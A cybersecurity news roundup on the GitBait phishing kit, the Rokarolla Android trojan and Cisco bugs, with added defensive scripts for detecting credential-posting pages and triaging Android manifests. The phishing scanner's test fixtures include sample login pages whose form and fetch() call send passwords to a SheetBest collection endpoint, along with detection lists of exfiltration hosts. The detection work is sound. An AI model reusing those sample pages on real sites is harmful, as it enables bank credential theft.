Serverless Phishing, Android Trojan, and Cisco Bugs Mark a Busy Week in Cyber Threats
A new serverless phishing kit called GitBait abuses GitHub Pages and SheetBest to steal Mexican banking credentials, while the Rokarolla Android trojan targets 217 banking and crypto apps. Cisco also updates a max-severity bug advisory.
A long-running phishing operation dubbed GitBait has abused GitHub Pages and a legitimate data service called SheetBest to steal banking credentials from customers of at least 12 Mexican financial institutions, according to new analysis from Group-IB. The campaign, which ran for roughly three years without its own server infrastructure, hosted fake bank pages on GitHub Pages and funneled stolen logins through SheetBest, which writes data directly into Google Sheets.
Group-IB identified more than 100 GitHub-hosted domains tied to the campaign, each serving several phishing pages. The modular kit included a desktop and mobile operator panel that let attackers pick a target bank and generate a matching fake page. Commit records on one repository showed 66 commits, indicating active development; three contributor accounts shared a single email address, and the pages were published automatically via Jekyll and GitHub Actions.
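The detection angle for defenders is that the fake login page never talks to the bank: its credential form (or an inline script) hands the submitted fields to a hosted data-collection API. The scanner below is an added example, not Group-IB's tooling or the GitBait kit's code. It flags a page that both collects a secret-looking field and ships it to an off-site collection endpoint. The SheetBest hostnames, the github.io check and the three sample pages are assumptions constructed for this demo.

```python
"""Flag HTML pages that collect credentials and post them to a third-party
data-collection API rather than to the site they impersonate.

Added example, not Group-IB's or the GitBait kit's code. EXFIL_HOSTS, the
github.io check and the sample pages below are assumptions for the demo."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosted form/data-collection services a bank login page has no reason to use.
# api.sheetbest.com is assumed to be SheetBest's API host; extend as needed.
EXFIL_HOSTS = {"api.sheetbest.com", "sheetbest.com"}
# Field names commonly used for secrets (Spanish "clave"/"nip" included for MX banks).
CRED_FIELDS = {"password", "pass", "pwd", "pin", "token", "otp", "clave", "nip"}
# URL argument of fetch("...") or xhr.open("POST", "...") inside inline scripts.
JS_URL_RE = re.compile(
    r"""(?:fetch|open)\(\s*(?:["'][A-Z]+["']\s*,\s*)?["'](https?://[^"']+)["']""", re.I)


class _FormScanner(HTMLParser):
    """Collect form actions, credential-style inputs and script request URLs."""

    def __init__(self):
        super().__init__()
        self.actions = []        # <form action=...> targets
        self.cred_fields = []    # inputs that look like secrets
        self.script_urls = []    # URLs requested from inline JS
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input":
            name = (a.get("name") or a.get("id") or "").lower()
            if (a.get("type") or "").lower() == "password" or name in CRED_FIELDS:
                self.cred_fields.append(name or "password")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_urls.extend(JS_URL_RE.findall(data))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_exfil_host(host):
    return host in EXFIL_HOSTS or any(host.endswith("." + h) for h in EXFIL_HOSTS)


def analyze_page(html, page_host):
    """Return credential fields, off-site targets, exfil targets and a verdict."""
    scanner = _FormScanner()
    scanner.feed(html)
    targets = scanner.actions + scanner.script_urls
    # Relative actions (host "") go to the page's own origin and are ignored.
    offsite = [u for u in targets if _host(u) and _host(u) != page_host.lower()]
    exfil = [u for u in offsite if _is_exfil_host(_host(u))]
    return {
        "cred_fields": scanner.cred_fields,
        "offsite_targets": offsite,
        "exfil_targets": exfil,
        # GitHub Pages default hosts; custom domains on Pages will not match this.
        "hosted_on_pages": page_host.lower().endswith(".github.io"),
        "suspicious": bool(scanner.cred_fields) and bool(exfil),
    }


# Constructed sample pages (not real captures).
PHISH_FORM = """<html><body>
<form action="https://api.sheetbest.com/sheets/0000-demo" method="post">
  <input name="usuario"><input type="password" name="clave">
</form></body></html>"""

PHISH_JS = """<html><body><input id="user"><input type="password" id="pwd">
<script>
fetch("https://api.sheetbest.com/sheets/0000-demo", {method: "POST", body: JSON.stringify(d)});
</script></body></html>"""

LEGIT_FORM = """<html><body>
<form action="/login" method="post">
  <input name="user"><input type="password" name="pass">
</form></body></html>"""

if __name__ == "__main__":
    for label, page, host in (("form", PHISH_FORM, "example-bank.github.io"),
                              ("js", PHISH_JS, "example-bank.github.io"),
                              ("legit", LEGIT_FORM, "bank.example")):
        print(label, analyze_page(page, host))
```

Run it over crawled pages (or a web proxy's HTML archive) keyed by the serving host; the useful signal is the combination, since many legitimate sites post to their own origin and many hosted forms collect nothing secret.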
Android Trojan Rokarolla Targets 217 Banking and Crypto Apps
Separately, researchers at Zimperium discovered a new Android banking trojan named Rokarolla that targets 217 banking and cryptocurrency applications and can execute 137 distinct commands on infected devices. The malware is primarily distributed through malicious websites that impersonate popular apps such as TikTok and Google Chrome.
- Rokarolla is named after its command-and-control infrastructure, according to Zimperium.
- The trojan enables device takeover capabilities, allowing attackers to perform actions including intercepting SMS messages and initiating fraudulent transactions.
- It requests accessibility service permissions to overlay fake login screens and capture credentials.
- Affected applications span multiple countries and include major banks and crypto exchanges.
- Zimperium recommends users avoid sideloading apps and verify app permissions carefully.
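The capabilities listed above map onto a small set of manifest-level requests: a service bound with the accessibility-service permission (needed to drive overlays and taps) alongside SMS and overlay permissions. The triage script below is an added example, not Zimperium's tooling or anything recovered from Rokarolla; it parses a decoded AndroidManifest.xml and reports that combination. The two manifests are constructed for the demo, and the package names are made up.

```python
"""Triage a decoded AndroidManifest.xml for the permission profile a
device-takeover banking trojan needs: an accessibility service plus SMS
and/or overlay access.

Added example, not Zimperium's code; both manifests below are constructed."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
A11Y_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"

# Permissions that matter for the takeover profile, with why they matter.
HIGH_RISK = {
    "android.permission.RECEIVE_SMS": "read incoming SMS (OTP interception)",
    "android.permission.READ_SMS": "read the SMS store",
    "android.permission.SEND_SMS": "send SMS from the device",
    OVERLAY_PERM: "draw windows over other apps (fake login screens)",
    "android.permission.REQUEST_INSTALL_PACKAGES": "install further APKs",
}


def triage_manifest(xml_text):
    """Return package, accessibility services, flagged permissions and a verdict."""
    root = ET.fromstring(xml_text)
    perms = {el.get(ANDROID_NS + "name") for el in root.iter("uses-permission")}
    # Services that only the system may bind as accessibility services.
    a11y_services = [
        svc.get(ANDROID_NS + "name")
        for svc in root.iter("service")
        if svc.get(ANDROID_NS + "permission") == A11Y_PERM
    ]
    flagged = {p: HIGH_RISK[p] for p in sorted(perms & set(HIGH_RISK))}
    sms = any(p.endswith("_SMS") for p in flagged)
    if a11y_services and (sms or OVERLAY_PERM in flagged):
        verdict = "device-takeover profile"
    elif a11y_services or flagged:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "package": root.get("package"),
        "accessibility_services": a11y_services,
        "flagged_permissions": flagged,
        "verdict": verdict,
    }


# Constructed manifest of a dropper posing as a browser (not a real sample).
TROJAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakechrome">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <application>
    <service android:name=".A11yService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed manifest of an ordinary networked app.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application><activity android:name=".MainActivity"/></application>
</manifest>"""

if __name__ == "__main__":
    for m in (TROJAN_MANIFEST, BENIGN_MANIFEST):
        print(triage_manifest(m))
```

The manifest is binary inside an APK; run this on the output of a decoder such as apktool. A legitimate accessibility app (a screen reader, say) also declares a bound accessibility service, so treat the "device-takeover profile" verdict as a reason to look at the app, not a conviction.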
Account Takeover Threats and Cisco SD-WAN Vulnerabilities
Account takeovers are on the rise as attackers bypass traditional defenses through phishing, session hijacking, and MFA fatigue attacks, Specops Software warned in a recent analysis. The firm recommends device trust and continuous verification to reduce risk, rather than relying solely on username and password authentication.
Cisco also updated a max-severity security advisory to include an additional SD-WAN device model. The vulnerability, which affects Cisco SD-WAN vEdge routers, could allow an unauthenticated attacker to execute arbitrary code on affected devices. Cisco urged customers to review their devices and apply available patches.
These developments underscore a growing trend: attackers increasingly rely on trusted cloud services and commodity malware kits rather than custom infrastructure, which makes detection harder for traditional blocklists.
Source reporting (10)
- Infosecurity Magazine · Serverless Phishing Kit on GitHub Targets Mexican Banks
- Help Net Security · Rokarolla Android trojan targets banking and crypto users, enables device takeover
- BleepingComputer · Why Account Takeovers Are Rising and How to Stop Them
- The Register · Cisco adds another SD-WAN box to max-severity bug advisory
- TechRadar Pro · Microsoft Teams users beware — relays hit by ransomware hackers looking to hide malicious traffic
- ZDNET · Google's big Android sideloading crackdown has a 24-hour catch - how the new limits work
- TechSpot · "The retail SSD market has almost disappeared" Silicon Motion says, as OEMs take what's left
- Help Net Security · ArmorCode helps product manufacturers prepare for EU Cyber Resilience Act requirements
- SecurityWeek · Rockwell Automation Patches Vulnerabilities in ICS Controllers and Software
- The Register · Homebrew 6.0 released with new security mechanism, Linux sandbox and more